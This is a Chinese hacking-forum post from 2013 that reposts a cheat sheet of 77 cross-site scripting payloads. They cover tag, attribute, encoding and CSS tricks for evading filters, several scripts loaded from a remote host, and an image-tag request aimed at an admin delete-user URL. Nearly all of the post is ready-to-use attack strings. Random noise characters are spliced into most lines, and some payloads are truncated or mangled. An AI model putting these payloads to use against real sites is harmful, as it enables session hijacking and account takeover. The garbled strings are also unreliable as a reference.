找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2875|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。3 b9 [; a5 F! k; v  a, H% {* R+ R
(1)普通的XSS JavaScript注入2 {+ k2 Y1 r! W9 F2 s' X0 G2 R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 M, ^8 G+ O: I; P7 C
(2)IMG标签XSS使用JavaScript命令: b3 G4 Z& M( U- \- @
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ l- v( t" A  H/ O(3)IMG标签无分号无引号) z* M9 ?; Z2 V' M! ~
<IMG SRC=javascript:alert(‘XSS’)>' n1 |  v- i) [2 u9 Q9 @
(4)IMG标签大小写不敏感# i0 B9 {# {. y% G% _: g
<IMG SRC=JaVaScRiPt:alert(‘XSS’)># T: W7 f4 |& W- w/ i
(5)HTML编码(必须有分号)+ R' y& h3 s5 I
<IMG SRC=javascript:alert(“XSS”)>4 f6 j0 ^2 }* Q) s% p7 ^8 Q/ t
(6)修正缺陷IMG标签
: s/ i1 r  e! U: s" ?% u) k<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
: T+ O3 ^4 i" K2 b5 s8 f; n, m( U
. A% K" k& C& o2 ?  b8 o0 G; \1 S3 O0 I5 Y
(7)formCharCode标签(计算器)
4 Q3 c! I+ l1 i4 o* j8 f9 A<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>( ?' ^7 T* l8 A, o4 g6 A7 S
(8)UTF-8的Unicode编码(计算器)
5 u1 Q6 y1 f0 [<IMG SRC=jav..省略..S')>
: ?+ H& Z9 ]6 V( w' L+ p(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
* U# B5 k8 t" V# C/ X<IMG SRC=jav..省略..S')>
+ K8 R+ ^! g: K/ j9 ]" J8 Q9 Z(10)十六进制编码也是没有分号(计算器)0 R. N' S* w. q4 U2 j8 e
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
# x$ A/ m# p- W1 v8 i(11)嵌入式标签,将Javascript分开& p; {0 a- s% G" @) Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 ~5 j1 G7 I$ Q# d. w
(12)嵌入式编码标签,将Javascript分开1 i( ~7 j" q" `1 y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 s/ y) X9 V1 O1 k& j! t# h(13)嵌入式换行符
6 W1 d; I2 W- e% q1 h- D  Z<IMG SRC=”jav ascript:alert(‘XSS’);”>3 ^- j- D: n; K( Q( V
(14)嵌入式回车
) j! w% [2 T6 |0 o% Z% j& ~( s7 u! L<IMG SRC=”jav ascript:alert(‘XSS’);”>
' [, t1 b/ q) s: z  u5 h0 _(15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 R, s( }/ q" ]" L0 o<IMG SRC=”javascript:alert(‘XSS‘)”>
' {  k3 f4 I7 b" X' m8 w) k7 b(16)解决限制字符(要求同页面)% i8 s0 |# R; z% _6 m
<script>z=’document.’</script>0 H$ I7 T6 r3 O7 E. n
<script>z=z+’write(“‘</script># i! P3 i4 |9 @8 G" F, M7 c
<script>z=z+’<script’</script>" ]# z7 ]% b! @! {. N0 h# C
<script>z=z+’ src=ht’</script>1 Y0 b7 S: R7 d  K, h
<script>z=z+’tp://ww’</script>
$ X8 O5 N' B4 B/ `9 h  d( s" @<script>z=z+’w.shell’</script>* X# r3 ?3 t* Y
<script>z=z+’.net/1.’</script>
  |0 S0 e3 B# `$ i<script>z=z+’js></sc’</script>7 Z, s! S/ V0 {5 ?' s% N
<script>z=z+’ript>”)’</script>9 M4 c$ m/ m5 l
<script>eval_r(z)</script>4 n, v) k: G% }8 C
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
. J. [7 j/ e+ h( r+ ^https://www.t00ls.net/viewthread ... table&tid=15267 2/6% |- o6 v- S' ^* W, @
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" W6 j8 ]/ b, E" z7 ]# Y( F; m(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
4 B) O6 |6 R/ x: kperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out' b3 K: S7 A4 f
(19)Spaces和meta前的IMG标签
1 M, `2 T3 P, m5 _* x' B<IMG SRC=” javascript:alert(‘XSS’);”>5 Q! J: \2 w- J$ P/ Z$ ?0 z) S7 F7 B
(20)Non-alpha-non-digit XSS
$ ^1 g7 O# E+ ?9 y! X+ M+ P<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. e+ m" k! d9 ^4 _) G(21)Non-alpha-non-digit XSS to 2
2 ~4 L. {; X9 N5 T) e<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& U' I) S! S- C2 `(22)Non-alpha-non-digit XSS to 3
7 K2 d: F4 Y$ A! c5 n6 ^9 u! V<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! g/ Q& ~! c8 ]7 m, |3 g! e4 f
(23)双开括号. f% d3 O. e# R2 @3 }
<<SCRIPT>alert(“XSS”);//<</SCRIPT>8 O8 b* J; ^: N: S3 ~/ P
(24)无结束脚本标记(仅火狐等浏览器)
* N1 Z6 e2 |1 `7 L# K) w% J<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
6 ~3 o+ G2 T: E$ {1 R8 Y% V(25)无结束脚本标记2' k. ~( D5 o3 v0 [( y$ d
<SCRIPT SRC=//3w.org/XSS/xss.js>
4 P2 _- g" x  b6 u8 t) l% D) g( P(26)半开的HTML/JavaScript XSS
9 @/ K+ k# O" B<IMG SRC=”javascript:alert(‘XSS’)”9 x# Y% \9 }( \! U
(27)双开角括号
; }, Z# D( W$ a: k3 [5 r3 A<iframe src=http://3w.org/XSS.html <
. H  |" I# I, Y8 W/ q" I& s(28)无单引号 双引号 分号
+ `9 P* l& s$ h3 {% i7 r<SCRIPT>a=/XSS/. X1 t9 ^6 v! R  f9 n; ~4 w
alert(a.source)</SCRIPT>% C3 X; ~+ _5 {% H, v
(29)换码过滤的JavaScript0 T$ k  d" X. ~* a7 G1 {
\”;alert(‘XSS’);//
7 s3 I  u6 H8 z, _" g) o: M(30)结束Title标签4 R. a, t( \) r: z$ L1 |4 P7 F9 Z7 F
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
* t/ T3 _/ w8 ?3 J/ c  B(31)Input Image
2 I7 l7 j+ r. M2 h1 K' n9 {( p3 [9 Y<INPUT SRC=”javascript:alert(‘XSS’);”>* a0 ~7 O" u' E/ w
(32)BODY Image
$ J$ {+ t4 L4 w8 H4 E* R$ z<BODY BACKGROUND=”javascript:alert(‘XSS’)”>2 e2 Q2 h1 V1 @7 ?
(33)BODY标签! z5 D4 O1 d  P+ A
<BODY(‘XSS’)>2 C" C/ e8 q; e. p# V1 x# c1 Y8 I
(34)IMG Dynsrc7 _4 M: `6 A* W/ N! Y; b! ?
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 [; N. e0 g' D9 l(35)IMG Lowsrc
7 o5 T: L, a3 |( K! F+ B<IMG LOWSRC=”javascript:alert(‘XSS’)”>
5 L! \' e" i  _(36)BGSOUND7 [; b1 \2 V% Y  {) V! ]
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
- {( w! n' p0 p( ~+ x8 k(37)STYLE sheet* t7 x3 t  D# f8 g
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& }4 Q5 O% Z8 M(38)远程样式表
  u' Q( F( S- @( v6 k: n<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 A5 C) I! s2 s; x# c7 b(39)List-style-image(列表式)9 m$ [% T; }+ v8 X
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS% h1 o$ G; }* N3 o' j  |+ w
(40)IMG VBscript
& f; ]5 Y7 a: Y6 @<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS; k# K% \7 N7 y
(41)META链接url
. ]& V; u6 u' K' T! R; g% c( r7 K+ e. D4 \; k
( ^, B: _+ m- u& _8 {
<META HTTP-EQUIV=”refresh” CONTENT=”0;2 J. h% J# V% X" r  `# i8 g2 f2 I& S0 W
URL=http://;URL=javascript:alert(‘XSS’);”>
- V5 T2 w4 F# a  z4 A  {(42)Iframe
+ S5 ~7 o" P# f8 l<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
  o" N. r$ G1 S& N6 Y9 B(43)Frame) a, o1 k' Y- l7 I1 ^/ ?
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
( ?. E8 Z! p3 A( E! z' P* U/ Q& [https://www.t00ls.net/viewthread ... table&tid=15267 3/6- K: g$ b, d( Z& G: Z6 d4 y
(44)Table
& W6 q; a7 |- \: v/ \<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ j' i8 I/ A. [(45)TD( r" K: k, Y: y, ~! Z
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ H/ {) p7 P2 E4 a$ {3 P+ t
(46)DIV background-image5 U* `' j. j* B9 X& G9 j7 `# O
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 U# C2 B: F: ?
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
6 L: b0 K4 G6 b' H7 j- F8&13&12288&65279)& r) v4 r. U2 `- [. w2 S
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 p' f/ g! [" z2 q7 J2 E1 A6 H(48)DIV expression
7 R: J1 h2 `% S6 l4 R, Y: Q2 S* E' @<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
( H. `( U8 q- L6 }& f(49)STYLE属性分拆表达
0 D/ @, x$ p& X; {<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>8 U! c  b; r/ H7 Y, ?5 {+ T
(50)匿名STYLE(组成:开角号和一个字母开头)
8 R% d9 E/ R/ _% i' a<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
+ ]# y# R, N  C3 k- |* `  [* e" k(51)STYLE background-image5 b. I. P7 ^6 k7 S- R) b
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
4 V2 ]$ ?- `" g5 q1 e: I: j7 eCLASS=XSS></A>
) \$ `$ y% d2 d5 x" R1 `(52)IMG STYLE方式4 b9 g! K/ n5 J. h
exppression(alert(“XSS”))’>8 p1 Y( w8 u' E% {# M  g
(53)STYLE background
* g; J9 X. t) u; V# E. |<STYLE><STYLE( k* T2 v9 U2 v9 `1 O) r! H! s  `
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
) G  \* a1 X" V  ?% h7 S3 l(54)BASE
1 Z" A, x/ H4 q) f5 |<BASE HREF=”javascript:alert(‘XSS’);//”>
  |$ X! G7 \8 R- m7 `(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* b) Y6 c4 l# k; N
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>9 Y3 U4 l: e3 A+ `0 ~; f6 I7 ^/ v! P
(56)在flash中使用ActionScrpt可以混进你XSS的代码5 ?- N; z, e$ Y( Y, T, C6 R
a=”get”;/ P8 l/ K+ _+ z; W$ _
b=”URL(\”";5 F6 k/ b3 Q0 q, c! x$ @; K
c=”javascript:”;
" f! w; r7 r  P0 G/ @) Gd=”alert(‘XSS’);\”)”;1 @) v! ]. J, R/ r, I( `8 ~3 j  j
eval_r(a+b+c+d);2 D) N) y, v# v+ h- y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上/ q8 }4 Q# `3 |5 x4 S) y# ]7 k
<HTML xmlns:xss>6 T' \8 v5 q* ^0 A: [9 d8 e
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
; y: y# z& b& A<xss:xss>XSS</xss:xss>! I7 k* a1 V) O5 i8 n2 J$ s
</HTML>
6 f& k" V" N7 ]) y8 F1 p0 u: q1 `' {(58)如果过滤了你的JS你可以在图片里添加JS代码来利用% M. {4 ~/ P- ?5 ?7 r& n; v5 I0 n
<SCRIPT SRC=””></SCRIPT>
( W- g8 @$ D9 Z! o. `- h(59)IMG嵌入式命令,可执行任意命令2 M  a5 K7 F, r! N
<IMG SRC=”http://www.XXX.com/a.php?a=b”>; |$ e+ B+ J* C4 l( p" f1 G- Y
(60)IMG嵌入式命令(a.jpg在同服务器)
/ S0 Z& \: ]" x( F6 @) w) w* @Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
+ R- D  u7 n7 z% b) y7 B(61)绕符号过滤+ |  W8 A; n, \# b
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 k' q: w& S. x% d(62)
; H, g  z/ o, p1 f# i<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% o1 O0 D/ Y' A: u$ W9 Y(63)
+ a3 c- w- k7 f  }<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
2 \0 n4 @$ u- L9 Y6 Y- ?+ t(64)
3 d5 _% m3 R% r<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>6 W' W) r  d# J- \; o, t
(65)0 n; E; n( A0 x5 q
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
$ ~8 s1 D- v& ~8 y8 q- Z$ d" w$ e2 X(66)12-7-1 T00LS - Powered by Discuz! Board
) W3 m5 F: i! n: T0 Xhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6$ `2 j" x4 B5 f0 z' u$ r0 Z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
. ?% ?: |9 k( {2 E% k4 Q(67)
( O1 s4 \) w1 q# A<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>: E+ [+ A1 k# ~: t
</SCRIPT>, h! C( T( r9 t# [
(68)URL绕行
# m3 j2 L( C8 N: Z2 m# u<A HREF=”http://127.0.0.1/”>XSS</A>
+ j) C5 t5 |! ~5 t, X' L  v. ^(69)URL编码
$ ^. `5 K# C- \<A HREF=”http://3w.org”>XSS</A>
* [. T: N  ^8 z. J$ i(70)IP十进制
$ L# ]& R2 [% Z! n% @1 K% x<A HREF=”http://3232235521″>XSS</A>
  W) {  V) Y* G" Q; A(71)IP十六进制' r) k8 K- f9 X0 g) c! z9 ^: o2 @
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>8 `4 k/ n9 }3 y) W9 R$ R
(72)IP八进制+ e- Q+ W% ]- h' E7 q) T
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 W$ r( C1 [; h' \( \) `(73)混合编码/ F# V4 V- p, l/ Q# h
<A HREF=”h
  S+ F5 h; ~  z$ S8 ztt p://6 6.000146.0×7.147/”">XSS</A>1 v& {% H/ k+ @- k" X$ D2 t
(74)节省[http:]3 d1 P! x# n4 B% u2 ]
<A HREF=”//www.google.com/”>XSS</A># _0 {2 m/ Z7 h3 z5 M
(75)节省[www]
) S: A  b" Z. N2 q! X& }. q<A HREF=”http://google.com/”>XSS</A>, Y+ O" ]& R& p' p% E
(76)绝对点绝对DNS1 M) {. s  X, S# {5 m% {$ E
<A HREF=”http://www.google.com./”>XSS</A>5 B3 L2 k4 o9 ~7 F+ J  W3 A
(77)javascript链接
# L, V; {3 D9 Y* g( ?% Z<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
+ D, Y3 Q+ {" C1 }4 |9 Z/ n" |0 G8 p! G3 j
原文地址:http://fuzzexp.org/u/0day/?p=147 e) u( v; q5 a0 w) e! R( Y0 _

! H: c5 b" V6 N( B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表